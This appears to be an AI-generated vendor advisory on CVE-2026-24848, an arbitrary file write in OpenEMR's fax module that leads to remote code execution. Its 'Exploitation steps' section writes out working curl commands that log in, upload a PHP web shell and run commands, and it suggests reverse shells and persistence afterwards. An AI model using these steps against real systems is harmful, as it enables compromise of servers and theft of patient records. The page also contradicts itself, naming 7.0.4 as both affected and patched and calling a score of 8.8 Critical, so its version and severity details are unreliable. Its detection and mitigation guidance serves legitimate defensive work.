CVE-2026-24848: 
OpenEMR vulnerability analysis and mitigation

Overview

CVE-2026-24848 is an arbitrary file write vulnerability in OpenEMR's disposeDocument() method within EtherFaxActions.php that allows authenticated users to write arbitrary content to arbitrary filesystem locations, enabling Remote Code Execution (RCE) via malicious PHP web shells. It affects OpenEMR versions 7.0.4 and earlier. The vulnerability was discovered on November 22, 2025, and publicly disclosed on March 3, 2026. It carries a CVSS v3.1 base score of 9.9 (Critical) per Feedly/NVD data, and 8.8 (Critical) per the GitHub security advisory (GitHub Advisory, Red Hat CVE).

Technical details

The root cause is a path traversal vulnerability (CWE-22) in the disposeDocument() method located in interface/modules/custom_modules/oe-module-faxsms/src/Controller/EtherFaxActions.php (lines 564–597). The method accepts a user-controlled file_path parameter and a base64-encoded content parameter without any path validation, file type restriction, content inspection, or authentication check beyond a basic session. When action=setup is supplied, the decoded content is written directly to the attacker-specified path via file_put_contents(), allowing placement of a PHP web shell anywhere on the filesystem accessible to the web server process. Exploitation requires only a valid OpenEMR account (any privilege level) and that the EtherFax fax provider module be enabled (GitHub Advisory).

Impact

Successful exploitation grants an authenticated attacker full Remote Code Execution as the web server user (e.g., apache), enabling complete system compromise. Attackers can exfiltrate all patient electronic health records (EHR) and PHI/PII, dump the database, install persistent backdoors, modify application code, deploy ransomware, and pivot laterally to internal database servers and other networked systems. The breach carries severe compliance consequences including HIPAA and GDPR violations, mandatory breach notifications, and potential financial penalties (GitHub Advisory).

Exploitability

A public proof-of-concept (PoC) exploit script is available in the GitHub security advisory, demonstrating full RCE in a step-by-step automated bash script. The vulnerability was verified and fully exploited by the researcher (tonghuaroot) on November 22, 2025. As of the time of disclosure, there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.0023 (low probability of near-term exploitation), and the vulnerability is not currently listed in the CISA KEV catalog (GitHub Advisory, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify internet-facing OpenEMR instances running version 7.0.4 or earlier with the EtherFax fax SMS module enabled, using tools like Shodan or Censys.
  2. Authentication: Log in to OpenEMR with any valid credentials (even low-privilege accounts): curl -c cookies.txt -b cookies.txt "http://<target>/interface/main/main_screen.php?auth=login&site=default" -d "new_login_session_management=1" -d "authUser=lowprivuser" -d "clearPass=password" -d "languageChoice=1"
  3. Prepare malicious payload: Create a PHP web shell and base64-encode it: ENCODED=$(echo -n '<?php system($_GET["cmd"]); ?>' | base64)
  4. Upload web shell: Send a crafted GET request to the vulnerable endpoint, specifying a web-accessible path for file_path and the encoded shell as content: curl -b cookies.txt "http://<target>/interface/modules/custom_modules/oe-module-faxsms/index.php?type=fax&_ACTION_COMMAND=disposeDocument&file_path=/var/www/localhost/htdocs/openemr/shell.php&action=setup&content=$ENCODED" — a successful response returns {"success":true,...}
  5. Achieve RCE: Access the uploaded shell via HTTP to execute arbitrary commands: curl "http://<target>/shell.php?cmd=id" — returns output such as uid=1000(apache) gid=101(apache)
  6. Post-exploitation: Use the shell to dump the database, exfiltrate patient records, establish a reverse shell, install persistence mechanisms (e.g., cron jobs), or pivot to internal systems (GitHub Advisory).

Indicators of compromise

  • Network: HTTP GET/POST requests to /interface/modules/custom_modules/oe-module-faxsms/index.php with parameters _ACTION_COMMAND=disposeDocument, action=setup, and file_path containing .php extensions or path traversal sequences; outbound connections from the web server to unknown external IPs (potential reverse shell activity).
  • File System: Unexpected .php files in the OpenEMR web root or subdirectories not matching normal application filenames (e.g., shell.php, backdoor.php, pwned.php); files with PHP code (<?php) in non-standard locations; recently modified files detectable via find /var/www -name "*.php" -mtime -1.
  • Logs: Apache access log entries showing requests to oe-module-faxsms/index.php with action=setup and file_path=...*.php; Apache error log entries showing PHP execution from unexpected file paths; repeated authentication attempts from a single IP followed by disposeDocument calls.
  • Process: Unusual child processes spawned by the Apache/PHP process (e.g., /bin/bash, nc, ncat, curl, wget); unexpected network listeners on non-standard ports (GitHub Advisory).

Mitigation and workarounds

Update OpenEMR to version 7.0.4 (patched release) immediately, as the patch adds authentication checks, path validation restricted to allowed directories, file extension whitelisting (pdf, tif, tiff, txt), and PHP content detection (GitHub Advisory). If immediate patching is not possible, disable the EtherFax/FaxSMS module by setting $GLOBALS['oefax_enable_fax'] = 0 in global configuration, or block access to the module path at the web server level using Apache .htaccess (<LocationMatch "oe-module-faxsms"> Require all denied </LocationMatch>) or firewall rules. Additionally, audit the filesystem for unexpected PHP files (find /var/www -name "*.php" -mtime -1) and review Apache access logs for signs of prior exploitation targeting the disposeDocument endpoint.

Community reactions

The vulnerability was responsibly disclosed by researcher tonghuaroot and published via GitHub's security advisory system on March 3, 2026. Red Hat tracked the advisory under their CVE database. Social media activity was observed on Bluesky (via CVE tracking accounts) shortly after disclosure. No major vendor statements beyond the OpenEMR project's own advisory or significant independent researcher commentary have been identified at this time (GitHub Advisory, Red Hat CVE).

Additional resources


Source: This report was generated using AI

Related OpenEMR vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-40506HIGH7
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 17, 2026
CVE-2026-76614MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40509MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40508MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40507MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management